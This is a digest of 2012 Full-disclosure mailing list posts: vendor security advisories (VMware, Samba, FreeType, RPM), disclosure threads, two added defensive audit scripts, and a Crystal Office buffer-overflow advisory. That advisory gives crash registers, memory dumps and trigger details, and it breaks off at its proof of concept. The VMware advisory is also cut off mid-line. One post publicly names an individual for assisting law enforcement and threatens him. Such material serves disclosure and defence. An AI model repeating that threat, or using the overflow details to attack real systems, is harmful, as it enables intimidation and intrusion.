[Full-disclosure] VMSA-2012-0007 VMware hosted products and ESXi/ESX patches address privilege escalation
VMware Security Advisory

Advisory ID: VMSA-2012-0007
Synopsis: VMware hosted products and ESXi/ESX patches address privilege escalation
Issue date: 2012-04-12
Updated on: 2012-04-12 (initial advisory)
CVE numbers: CVE-2012-1518

1. Summary

VMware hosted products and ESXi/ESX patches address privilege escalation.

2. Relevant releases

Workstation 8.0.1 and earlier
Player 4.0.1 and earlier
Fusion 4.1.1 and earlier
ESXi 5.0 without patch ESXi500-201203102-SG
ESXi 4.1 without patch ESXi410-201201402-BG
ESXi 4.0 without patch ESXi400-201203402-BG
ESXi 3.5 without patch ESXe350-201203402-T-BG
ESX 4.1 without patch ESX410-201201401-SG
ESX 4.0 without patch ESX400-201203401-SG
ESX 3.5 without patch ESX350-201203402-BG

3. Problem Description

a. VMware Tools Incorrect Folder Permissions Privilege Escalation

The access control list of the VMware Tools folder is incorrectly set. Exploitation of this issue may lead to local privilege escalation on Windows-based Guest Operating Systems.

VMware would like to thank Tavis Ormandy for reporting this issue to us.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-1518 to this issue.

Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.

VMware Product   Product Version   Running on   Replace with/Apply Patch *
vCenter          any               Windows      not affected
Workstation      8.x               any          8.0.2 or later
Player           4.x               any          4.0.2 or later
Fusion           4.x               Mac OS/X     4.1.2 or later **
ESXi             5.0               ESXi         ESXi500-201203102-SG
ESXi             4.1               ESXi         ESXi410-201201402-BG
ESXi             4.0               ESXi         ESXi400-201203402-BG
ESXi             3.5               ESXi         ESXe350-201203402-T-BG
ESX              4.1               ESX          ESX410-201201401-SG
ESX              4.0               ESX          ESX400-201203401-SG
ESX              3.5               ESX          ESX350-201203402-BG

* Notes on updating VMware Guest Tools: After the update or patch is applied, VMware Guest Tools must be updated in any pre-existing Windows-based Guest Operating System. Windows-based Virtual Machines that have moved to Workstation 8, Player 4 or Fusion 4 from a lower version of Workstation, Player or Fusion are affected.

** The built-in update feature of Fusion can be used immediately to upgrade to 4.1.2. The Web download of Fusion 4.1.2 will be available on 2012-04-14.

4. Solution

Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

Workstation 8.0.2
http://www.vmware.com/go/downloadworkstation
Release notes: https://www.vmware.com/support/ws80/doc/releasenotes_workstation_802.html
Downloads: VMware Workstation for Windows 32-bit and 64-bit with VMware Tools; VMware Workstation for Linux 32-bit with VMware Tools; VMware Workstation for Linux 64-bit with VMware Tools

Player 4.0.2
http://www.vmware.com/go/downloadplayer
Release notes: https://www.vmware.com/support/player40/doc/releasenotes_player402.html
Downloads: VMware Player for Windows 32-bit and 64-bit; VMware Player for Linux 32-bit; VMware Player for Linux 64-bit

Fusion 4.1.2
http://www.vmware.com/go/downloadfusion
Release Notes: http://www.vmware.com/support/fusion4/doc/releasenotes_fusion_412.html
Downloads: VMware Fusion (for Intel-based Macs)

ESXi and ESX
http://downloads.vmware.com/go/selfsupport-download

ESXi 5.0
update-from-esxi5.0-5.0_update01
http://kb.vmware.com/kb/2010823
update-from-esxi5.0-5.0_update01 contains ESXi500-2012
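The advisory describes the issue class but not the offending ACL entry, so a guest administrator's first question is "which principals can write to that folder?". The audit below is an added example (not VMware's code or tooling): it parses the text printed by the Windows `icacls <folder>` command and flags write-capable rights held by principals every interactive user belongs to. The listings it runs on are constructed, and the VMware Tools install path is an assumption rather than something the advisory states.

```python
"""Audit a folder ACL for write rights granted to low-privileged principals.

Added example for the VMSA-2012-0007 issue class (a program folder whose ACL
lets ordinary users modify it); it is not VMware's code or tooling. It parses
the text printed by the Windows `icacls <folder>` command, so it can be run on
the guest against real output or, as here, offline against constructed listings.
The install path below is the usual VMware Tools location and is an assumption,
not something stated in the advisory.
"""
import re

# Principals every interactive user on the guest belongs to: rights granted to
# them are reachable from an unprivileged account. Compared case-insensitively.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls simple rights and specific rights that let a principal add, replace,
# delete or re-permission content under the folder.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}

# One ACE per line: "<principal>:(flag)(flag)...", e.g. BUILTIN\Users:(OI)(CI)(M)
ACE_RE = re.compile(r"^(?P<principal>[^:()]+):(?P<flags>(?:\([^)]*\))+)$")


def parse_icacls(output, path):
    """Return [(principal, [flag, ...]), ...] from icacls output for `path`.

    icacls prints the path in front of the first ACE and indents the rest;
    the trailing 'Successfully processed ...' summary carries no ACE.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m:
            flags = re.findall(r"\(([^)]*)\)", m.group("flags"))
            aces.append((m.group("principal"), flags))
    return aces


def risky_entries(aces):
    """ACEs that give a low-privileged principal any write-type right.

    Inheritance flags are reported too: an (IO) entry does not apply to the
    folder itself but still covers the files and subfolders created under it,
    which is where a replaceable program binary would live.
    """
    findings = []
    for principal, flags in aces:
        if principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        tokens = {t for group in flags for t in group.split(",") if t}
        granted = tokens & WRITE_RIGHTS
        if granted:
            findings.append({
                "principal": principal,
                "rights": sorted(granted),
                "inherited": "I" in tokens,
                "inherit_only": "IO" in tokens,
            })
    return findings


SAMPLE_PATH = r"C:\Program Files\VMware\VMware Tools"  # assumed install path

# Constructed icacls listing: Users hold Modify as an explicit (non-inherited) ACE.
WEAK_LISTING = (
    SAMPLE_PATH + " BUILTIN\\Users:(OI)(CI)(M)\n"
    "                                    NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)\n"
    "                                    BUILTIN\\Administrators:(I)(OI)(CI)(F)\n"
    "                                    CREATOR OWNER:(I)(OI)(CI)(IO)(F)\n"
    "\n"
    "Successfully processed 1 files; Failed processing 0 files\n"
)

# Constructed listing after the fix: Users only inherit read/execute from Program Files.
FIXED_LISTING = (
    SAMPLE_PATH + " NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)\n"
    "                                    BUILTIN\\Administrators:(I)(OI)(CI)(F)\n"
    "                                    BUILTIN\\Users:(I)(OI)(CI)(RX)\n"
    "                                    CREATOR OWNER:(I)(OI)(CI)(IO)(F)\n"
    "\n"
    "Successfully processed 1 files; Failed processing 0 files\n"
)

if __name__ == "__main__":
    for label, listing in (("weak", WEAK_LISTING), ("fixed", FIXED_LISTING)):
        found = risky_entries(parse_icacls(listing, SAMPLE_PATH))
        print(f"{label}: {found or 'no low-privileged write access'}")
```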
Re: [Full-disclosure] Most Linux distributions don't use tmpfs nor encrypt swap by default
Fedora Core 15:

/dev/mapper/vg_youwish-lv_swap  swap  swap   defaults  0 0
tmpfs                           /tmp  tmpfs  defaults  0 0

Removed other options it should have, but defaults do not include nosuid,nodev,noexec.

On 4/12/12, Mark Krenz wrote:
>
> Hello. After posting the flaw with libvte's handling of the scrollback
> buffer (writing it to disk), there were several people who made the
> erroneous claim that most distributions of Linux use tmpfs now and
> encrypt swap and that this shouldn't be an issue.
>
> Because these claims attempted to diminish the importance of the flaw
> for many, I installed most of the popular distributions of Linux as well
> as some of the BSDs for comparison to see what their default setup was
> after installation. I have found that of the 35+ distribution versions
> that I tested, only the latest Arch Linux puts /tmp on tmpfs by default
> and the only other distributions that show it as an option during
> installation are Mageia or PC Linux OS. So the libvte flaw indeed is a
> widespread problem.
>
> I've documented the results at:
>
> http://www.climagic.org/bugreports/libvte-flaw-distro-defaults-chart.html
>
> You can view the libvte bug report here:
>
> http://climagic.org/bugreports/libvte-scrollback-written-to-disk.html
>
> Extra Note: I'm not suggesting that everyone put their /tmp on tmpfs
> and/or start using encrypted filesystem. There are other considerations
> which I talk about in the document above.
>
> --
> Mark S. Krenz
> IT Director
> Suso Technology Services, Inc.
>
> Sent from Mutt using Linux

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Backtrack 5 R2 priv escalation 0day found in CTF exercise
They can now install wicd on a Linux machine and then say "Linux priv escalation 0day found in CTF exercise". hehehe

2012/4/12 InterN0T Advisories
> And now for some truth / enlightenment:
>
> http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/
> http://www.backtrack-linux.org/forums/showthread.php?t=49411
> http://www.secmaniac.com/blog/
>
> On Wed, 11 Apr 2012 09:47:39 -0500, "Adam Behnke" wrote:
> > wicd Privilege Escalation 0Day
> > Tested against Backtrack 5, 5 R2, Arch distributions
> >
> > Spawns a root shell. Has not been tested for potential remote exploitation
> > vectors.
> >
> > Discovered by a student that wishes to remain anonymous in the course CTF.
> > This 0day exploit for Backtrack 5 R2 was discovered by a student in the
> > InfoSec Institute Ethical Hacking class, during an evening CTF exercise. The
> > student wishes to remain anonymous, he has contributed a python version of
> > the 0day, a patch that can be applied to wicd, as well as a writeup
> > detailing the discovery and exploitation process. You can find a python
> > version of the exploit and full write up with patch here:
> > http://www.infosecinstitute.com/courses/ethical_hacking_training.html
Re: [Full-disclosure] Erroneous post concerning Backtrack 5 R2 0day
in soviet russia, lesson teaches you. in west, no lesson learnt by anyone.

On Thu, Apr 12, 2012 at 9:51 PM, Adam Behnke wrote:
> Yesterday I made a post concerning a 0day advisory in Backtrack 5 R2:
> http://seclists.org/fulldisclosure/2012/Apr/123
>
> The posting was incorrect, the vulnerability was NOT in Backtrack but in
> wicd, no Backtrack contributed code is vulnerable. When we tweeted and
> emailed to mailing lists the notifications of this vulnerability, we
> incorrectly shortened the title and called it "Backtrack 5 R2 priv
> escalation 0day", which is misleading and could lead people to believe the
> bug was actually in Backtrack. The bug has always resided in wicd and not in
> any Backtrack team written code. We apologize for the confusion to the
> Backtrack team and any other persons affected by this error. We feel the
> Backtrack distro is a great piece of software and wish muts and the rest of
> the team the best.
[Full-disclosure] Erroneous post concerning Backtrack 5 R2 0day
Yesterday I made a post concerning a 0day advisory in Backtrack 5 R2:
http://seclists.org/fulldisclosure/2012/Apr/123

The posting was incorrect, the vulnerability was NOT in Backtrack but in wicd, no Backtrack contributed code is vulnerable. When we tweeted and emailed to mailing lists the notifications of this vulnerability, we incorrectly shortened the title and called it "Backtrack 5 R2 priv escalation 0day", which is misleading and could lead people to believe the bug was actually in Backtrack. The bug has always resided in wicd and not in any Backtrack team written code. We apologize for the confusion to the Backtrack team and any other persons affected by this error. We feel the Backtrack distro is a great piece of software and wish muts and the rest of the team the best.
[Full-disclosure] [SECURITY] [DSA 2450-1] samba security update
Debian Security Advisory DSA-2450-1          secur...@debian.org
http://www.debian.org/security/              Thijs Kinkhorst
April 12, 2012                               http://www.debian.org/security/faq

Package         : samba
Vulnerability   : privilege escalation
Problem type    : remote
Debian-specific : no
CVE ID          : CVE-2012-1182
Debian Bug      : 668309

It was discovered that Samba, the SMB/CIFS file, print, and login server, contained a flaw in the remote procedure call (RPC) code which allowed remote code execution as the super user from an unauthenticated connection.

For the stable distribution (squeeze), this problem has been fixed in version 2:3.5.6~dfsg-3squeeze7.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in version 2:3.6.4-1.

We recommend that you upgrade your samba packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[Full-disclosure] [SE-2012-01] Security weakness in Apple Quicktime Java extensions
Hello,

Security Explorations discovered a security vulnerability in Apple Quicktime [1] software and its Java extensions in particular. When combined with the Issue 15 reported to Oracle on Apr 2 2012 [2], this new issue might be used to successfully bypass all JVM security restrictions on a vulnerable system.

Security Explorations developed a Proof of Concept code that exploits Issue 15 and the new Apple Quicktime flaw (Issue 22) to achieve a complete JVM security sandbox bypass in a Windows OS environment. The code targets 32-bit Java Plugin only (the default for 32-bit web browsers) and Apple Quicktime 7.7.1. It has been successfully tested with the following combination of Java SE, OS and web browsers:

- Windows XP SP3, Windows 7 HP 64-bit, Windows 7 Pro 32-bit,
- Mozilla Firefox 11.0, Internet Explorer 9.0, Opera 11.62,
- JRE / JDK 1.6 Update 31.

Issue 22 could not be exploited in a 64-bit JRE environment. This is due to the fact that 32-bit web browsers do not seem to work with a 64-bit Java at all. For a 64-bit web browser such as Internet Explorer and corresponding 64-bit JRE Plugin, no Quicktime Java extensions are visible in a target JVM's system classloader namespace.

On Apr 12 2012, Security Explorations sent a security notice to Apple informing the company about a discovered vulnerability. Along with the notice, the company also received our Proof of Concept code.

More technical details regarding the discovered security vulnerability in Apple Quicktime will be disclosed at the time of the publication of the SE-2012-01 project (Security Vulnerabilities in Java SE).

Thank you.

Best Regards
Adam Gowdiak
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"

References:
[1] Apple Quicktime
    http://www.apple.com/quicktime/what-is/
[2] SE-2012-01, Vendors status
    http://www.security-explorations.com/en/SE-2012-01-status.html
[Full-disclosure] Last Mile, April 20 || CfP: SECURWARE 2012 || August 19-24, 2012 - Rome, Italy
INVITATION:

Please consider to contribute to and/or forward to the appropriate groups the following opportunity to submit and publish original scientific results to SECURWARE 2012. The submission deadline is set to April 20, 2012.

In addition, authors of selected papers will be invited to submit extended article versions to one of the IARIA Journals: http://www.iariajournals.org

SECURWARE 2012 | Call for Papers

CALL FOR PAPERS, TUTORIALS, PANELS

SECURWARE 2012: The Sixth International Conference on Emerging Security Information, Systems and Technologies
August 19-24, 2012 - Rome, Italy

General page: http://www.iaria.org/conferences2012/SECURWARE12.html
Call for Papers: http://www.iaria.org/conferences2012/CfPSECURWARE12.html
- regular papers
- short papers (work in progress)
- posters
Submission page: http://www.iaria.org/conferences2012/SubmitSECURWARE12.html
Submission deadline: April 20, 2012
Sponsored by IARIA, www.iaria.org
Extended versions of selected papers will be published in IARIA Journals: http://www.iariajournals.org

Please note the Poster and Work in Progress options.

The topics suggested by the conference can be discussed in terms of concepts, state of the art, research, standards, implementations, running experiments, applications, and industrial case studies. Authors are invited to submit complete unpublished papers, which are not under review in any other conference or journal, in the following, but not limited to, topic areas. All tracks are open to both research and industry contributions, in terms of Regular papers, Posters, Work in progress, Technical/marketing/business presentations, Demos, Tutorials, and Panels.

Before submission, please check and comply with the editorial rules: http://www.iaria.org/editorialrules.html

SECURWARE 2012 Topics (topics and submission details: see CfP on the site)

ARCH: Security frameworks, architectures and protocols
Formal aspects of security; Security analysis methodologies; Security verification; Security protocols; Security architectures and formalisms; Security and design vulnerability; Security and privacy protection; Performance and security; Secure group communication/multicast; Software design security; Middleware security; Security for nomadic code; Intrusion detection systems; Static analysis for software security; Security modeling

METRICS: Security, trust and privacy measurement
Security, trust and privacy metrics; Security assurance metrics; Security measurement architectures; Metrics for adaptive security systems; Taxonomical and ontological support of security metrics; Experiments and benchmarks for security measurements; Embedding security measurability in software and service architectures; Risk-driven assessment of security; Assessment of effectiveness, efficiency and correctness of security; Mapping security metrics and security assurance metrics; Mapping security measurements and non-functional requirements

SECMAN: Security management
Identity management; Security law enforcement; PKI; PKI Key management; Incident response planning; Intrusion detection and event correlation; Firewalls; Trust management; Software security assurance

SECTECH: Security technologies
Secure protocols; Applied cryptography; Smart cards; Biometrics; Digital rights management; Electronic surveillance; Database security

SYSSEC: System security
Internet security; Security in wireless; Sensor/cellular network security; Ad hoc network security; Security in peer-to-peer networks; Security in wireless multimedia systems; Security in different networks (mesh, personal, local, metropolitan, GSM, Bluetooth, WiMax, IEEE 802.x, etc.); Security of emergency services

INFOSEC: Information security
Information hiding; Anonymity; Authentication; Data Integrity; Security data mining; Data confidentiality and integrity; Information flow protection; Trustworthy networks: authentication, privacy and security models; Secure service discovery; Secure location-based service; Information survivability

RISK: Risk and security
Operational risk (opRisk); OpRisk and field studies; Reputation risk; Risk and security-awareness; Business continuity and disaster recovery; Privacy-awareness; Security and trust

MALWA: Malware and Anti-malware
Threat taxonomies and modeling; Security threats; Threats propagation; Anti-malware technologies; Engineering anti-malware; Anti-virus, anti-spyware, anti-phishing; Malware propagation models; Profiling security information; Vulnerability analysis and countermeasures; Denial of service attacks; Measurements and metrics; Testing samples and techniques; Quarantine/reuse decisions; Anti-malware tool performance; Anti-malware tool suites; Open-source anti-malware; Host-based anti-malware; On-line anti-malware scanning

MISUSE: Electronic abuse protection
Messaging, viruses, spyware; Advanced misuse detection techniques /machine learning
[Full-disclosure] Most Linux distributions don't use tmpfs nor encrypt swap by default
Hello. After posting the flaw with libvte's handling of the scrollback buffer (writing it to disk), there were several people who made the erroneous claim that most distributions of Linux use tmpfs now and encrypt swap and that this shouldn't be an issue.

Because these claims attempted to diminish the importance of the flaw for many, I installed most of the popular distributions of Linux as well as some of the BSDs for comparison to see what their default setup was after installation. I have found that of the 35+ distribution versions that I tested, only the latest Arch Linux puts /tmp on tmpfs by default and the only other distributions that show it as an option during installation are Mageia or PC Linux OS. So the libvte flaw indeed is a widespread problem.

I've documented the results at:

http://www.climagic.org/bugreports/libvte-flaw-distro-defaults-chart.html

You can view the libvte bug report here:

http://climagic.org/bugreports/libvte-scrollback-written-to-disk.html

Extra Note: I'm not suggesting that everyone put their /tmp on tmpfs and/or start using encrypted filesystem. There are other considerations which I talk about in the document above.

--
Mark S. Krenz
IT Director
Suso Technology Services, Inc.

Sent from Mutt using Linux
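Both this post and the Fedora Core 15 fstab quoted in the reply above come down to three questions about a host: is /tmp on tmpfs, does its mount carry nosuid,nodev,noexec (which "defaults" does not imply), and is swap actually encrypted. The audit below is an added example, not code from either poster: it answers them from fstab and crypttab text, using a constructed fstab modelled on the Fedora lines in the thread and a made-up hardened layout, and treats a /dev/mapper swap device as encrypted only when crypttab defines the mapping, since LVM volumes live under /dev/mapper too.

```python
"""Audit fstab/crypttab for the /tmp-on-tmpfs, mount-option and swap
encryption defaults the thread discusses.

Added example, not from any of the posts. Both files are passed in as text so
the constructed samples below run offline; read /etc/fstab and /etc/crypttab
into strings to audit a real host. The Fedora-style sample is modelled on the
fstab lines quoted in the reply, the hardened sample is made up.
"""
from dataclasses import dataclass, field

# None of these is implied by "defaults" (rw,suid,dev,exec,auto,nouser,async).
HARDENING_OPTS = {"nosuid", "nodev", "noexec"}


@dataclass
class Audit:
    tmp_entry: bool = False          # is /tmp listed in fstab at all?
    tmp_on_tmpfs: bool = False
    tmp_missing_opts: set = field(default_factory=set)
    swap_encrypted: dict = field(default_factory=dict)  # device -> bool


def parse_fstab(text):
    """Yield (device, mountpoint, fstype, option set) per real fstab entry."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blanks
        fields = line.split()
        if len(fields) < 4:
            continue   # fstab needs device, mountpoint, type and options
        device, mountpoint, fstype, opts = fields[:4]
        yield device, mountpoint, fstype, set(opts.split(","))


def crypt_mappings(crypttab_text):
    """Names of dm-crypt mappings defined in crypttab (first column)."""
    names = set()
    for line in crypttab_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            names.add(line.split()[0])
    return names


def audit(fstab_text, crypttab_text=""):
    result = Audit()
    mappings = crypt_mappings(crypttab_text)
    for device, mountpoint, fstype, opts in parse_fstab(fstab_text):
        if mountpoint == "/tmp":
            result.tmp_entry = True
            result.tmp_on_tmpfs = fstype == "tmpfs"
            result.tmp_missing_opts = HARDENING_OPTS - opts
        elif fstype == "swap":
            # A /dev/mapper/ path only shows device-mapper is in use; LVM volumes
            # live there too. Count swap as encrypted only if crypttab defines
            # the mapping (the live check on a host is `cryptsetup status <name>`).
            name = device.rsplit("/", 1)[-1]
            result.swap_encrypted[device] = name in mappings
    return result


# Constructed, modelled on the Fedora Core 15 fstab quoted in the thread.
FEDORA_FSTAB = """
/dev/mapper/vg_youwish-lv_swap  swap  swap   defaults  0 0
tmpfs                           /tmp  tmpfs  defaults  0 0
"""

# Constructed hardened layout: tmpfs /tmp with the three options, swap on a
# random-key dm-crypt mapping declared in crypttab.
HARDENED_FSTAB = """
/dev/mapper/cryptswap  none  swap   defaults                       0 0
tmpfs                  /tmp  tmpfs  nosuid,nodev,noexec,mode=1777  0 0
"""
HARDENED_CRYPTTAB = "cryptswap /dev/sda3 /dev/urandom swap,cipher=aes-xts-plain64\n"

if __name__ == "__main__":
    for label, fstab, crypttab in (("fedora-like", FEDORA_FSTAB, ""),
                                   ("hardened", HARDENED_FSTAB, HARDENED_CRYPTTAB)):
        print(label, audit(fstab, crypttab))
```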
[Full-disclosure] Patrick Belcher
This is just a message for Patrick Belcher, CISSP... we're watching you.

Seems he's been investigating, collecting and providing information about Occupy and Anonymous (and similar groups) to people in Law Enforcement and trying to keep his name out of it for fear of retaliation.

Welcome to public exposure, Patrick!
Re: [Full-disclosure] Backtrack 5 R2 priv escalation 0day found in CTF exercise
And now for some truth / enlightenment:

http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/
http://www.backtrack-linux.org/forums/showthread.php?t=49411
http://www.secmaniac.com/blog/

On Wed, 11 Apr 2012 09:47:39 -0500, "Adam Behnke" wrote:
> wicd Privilege Escalation 0Day
> Tested against Backtrack 5, 5 R2, Arch distributions
>
> Spawns a root shell. Has not been tested for potential remote exploitation
> vectors.
>
> Discovered by a student that wishes to remain anonymous in the course CTF.
> This 0day exploit for Backtrack 5 R2 was discovered by a student in the
> InfoSec Institute Ethical Hacking class, during an evening CTF exercise. The
> student wishes to remain anonymous, he has contributed a python version of
> the 0day, a patch that can be applied to wicd, as well as a writeup
> detailing the discovery and exploitation process. You can find a python
> version of the exploit and full write up with patch here:
> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
[Full-disclosure] [ MDVSA-2012:057 ] freetype2
Mandriva Linux Security Advisory                         MDVSA-2012:057
http://www.mandriva.com/security/

Package : freetype2
Date    : April 12, 2012
Affected: 2010.1, 2011, Enterprise Server 5.0

Problem Description:

Multiple flaws were found in FreeType. Specially crafted files could cause application crashes or potentially execute arbitrary code (CVE-2012-1126, CVE-2012-1127, CVE-2012-1128, CVE-2012-1129, CVE-2012-1130, CVE-2012-1131, CVE-2012-1132, CVE-2012-1133, CVE-2012-1134, CVE-2012-1135, CVE-2012-1136, CVE-2012-1137, CVE-2012-1138, CVE-2012-1139, CVE-2012-1140, CVE-2012-1141, CVE-2012-1142, CVE-2012-1143, CVE-2012-1144).

The updated packages have been patched to correct this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1126
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1127
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1128
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1129
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1130
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1131
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1132
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1133
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1134
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1135
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1136
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1137
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1138
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1139
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1140
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1141
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1143
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1144

Updated Packages:

Mandriva Linux 2010.1, Mandriva Linux 2010.1/X86_64, Mandriva Linux 2011, Mandriva Linux 2011/X86_64, Mandriva Enterprise Server 5, Mandriva Enterprise Server 5/X86_64
[Full-disclosure] [ MDVSA-2012:056 ] rpm
Mandriva Linux Security Advisory                         MDVSA-2012:056
http://www.mandriva.com/security/

Package : rpm
Date    : April 12, 2012
Affected: 2010.1, Enterprise Server 5.0

Problem Description:

Multiple flaws were found in the way RPM parsed package file headers. An attacker could create a specially-crafted RPM package that, when its package header was accessed, or during package signature verification, could cause an application using the RPM library to crash or, potentially, execute arbitrary code (CVE-2012-0060, CVE-2012-0061, CVE-2012-0815).

The updated packages have been patched to correct this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0815
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0060
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0061
https://bugzilla.redhat.com/show_bug.cgi?id=744104
https://bugzilla.redhat.com/show_bug.cgi?id=744858
https://bugzilla.redhat.com/show_bug.cgi?id=798585

Updated Packages:

Mandriva Linux 2010.1, Mandriva Linux 2010.1/X86_64, Mandriva Enterprise Server 5, Mandriva Enterprise Server 5/X86_64

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.

You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type  Bits/KeyID      Date        User ID
pub   1024D/22458A98  2000-07-10  Mandriva Security Team
[Full-disclosure] Crystal Office Suite v1.43 - Buffer Overflow Vulnerability
Title:
======
Crystal Office Suite v1.43 - Buffer Overflow Vulnerability

Date:
=====
2012-04-12

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=489

VL-ID:
=====
489

Introduction:
=============
Crystal Office is the essential office suite ideal for home and business users, delivering more tools that make your work go faster and your life go easier. Find all the essential office software to complete routine tasks faster and with better results. Create and edit text and graphics in letters, reports, documents and Web pages. Perform calculations and manage lists in spreadsheets. Keep track of appointments and tasks. Open, edit and save Microsoft® Office documents.

What's Included:

• NotePro - feature-packed, easy-to-use word processor. Create polished documents of any length or type, including reports, letters, resumes and brochures. Manage standard text files, Rich Text Format, Word, and HTML.

• DayMate - a versatile, intuitive day planner. Use DayMate to create and schedule reminders that can pop up messages, start applications or open documents, check for new e-mail, dial phone numbers, send messages, and open specified Web sites.

• CellPro - a powerful and easy-to-use spreadsheet application. Use CellPro to create budgets, invoices, receipts and expense reports. Organize, analyze and manage important data and financial information. Open and save Microsoft Excel files.

• ChartPro - a project management software application that is used to create and display projects using a Work Breakdown Structure (WBS) chart. A WBS chart displays the structure of a project, showing how a project is organized into summary and detail levels. Using a WBS chart is a more intuitive approach to planning and displaying a project.

• Clip Plus - the award-winning Windows Clipboard enhancer. It works alongside the regular clipboard and automatically grabs and saves text, images, and objects as they are copied to the clipboard - making them available for saving, reuse, and printing.

(Copy of the Vendor Homepage: http://www.crystaloffice.com )

Abstract:
=========
A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability in Crystal Office Suite v1.43.

Report-Timeline:
================
2012-04-02: Vendor Notification 1
2012-04-08: Vendor Notification 2
2012-04-09: Vendor Response/Feedback
2012-04-12: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Crystal Office Systems
Product: Office Suite, CellPro, ChartPro, ClipPlus & NotePro v1.43, 1.23, 1.23, 1.43 & 3.88

Exploitation-Technique:
=======================
Local

Severity:
=========
High

Details:
========
A Buffer Overflow vulnerability is detected in Crystal Office Suite v1.43 (current version). All included programs are vulnerable: CellPro, ChartPro, ClipPlus and NotePro. The vulnerability is located in each of the program executables. An oversized string in the registry values Recent1, Recent2 etc. within the keys:

[HKEY_CURRENT_USER/Software/Crystal Office/CellPro]
[HKEY_CURRENT_USER/Software/Crystal Office/ChartPro]
[HKEY_CURRENT_USER/Software/Crystal Office/ClipPlus]
[HKEY_CURRENT_USER/Software/Crystal Office/NotePro]

results in a local buffer overflow. The value is read while opening the File menu. An attacker needs to manipulate the registry value and has to trick the victim into hovering over the ReOpen menu item within the File menu.
--- Debug Logs ---

# Registers:
EAX
ECX 42424242
EDX 7C9132BC ntdll.7C9132BC
EBX
ESP 0012E4E8
EBP 0012E508
ESI
EDI
EIP 42424242

# Stack:
0012E4D8  7C929F68  ntdll.7C929F68
0012E4DC  01B4
0012E4E0  7C91D80A  ntdll.7C91D80A
0012E4E4  7C9601E1  ntdll.7C9601E1
0012E4E8  7C9132A8  RETURN to ntdll.7C9132A8   <-- ESP
0012E4EC  0012E5D0
0012E4F0  0012F900  ASCII C CCC
0012E4F4  0012E5EC
0012E4F8  0012E5A4

# Disassembly:
7C91329D  FF75 0C     PUSH DWORD PTR SS:[EBP+C]
7C9132A0  FF75 08     PUSH DWORD PTR SS:[EBP+8]
7C9132A3  8B4D 18     MOV ECX,DWORD PTR SS:[EBP+18]
7C9132A6  FFD1        CALL ECX
7C9132A8  64:8B25     MOV ESP,DWORD PTR FS:[0]
7C9132AF  64:8F05     POP DWORD PTR FS:[0]
7C9132B6  8BE5        MOV ESP,EBP
7C9132B8  5D          POP EBP
7C9132B9  C2 1400     RETN 14
7C9132BC  8B4C24 04   MOV ECX,DWORD PTR SS:[ESP+4]

# Dump:
0012F8E8  41 41 41 41 41 41 41 41
0012F8F0  41 41 41 41 41 41 41 41
0012F8F8  41 41 41 41 41 41 41 41
0012F900  41 41 41 41 42 42 42 42
0012F908  43 43 43 43 43 43 43 43
0012F910  43 43 43 43 43 43 43 43
0012F918  43 43 43 43 43 43 43 43

Picture(s):
../1.png

Proof of Concept:
=================
The vul
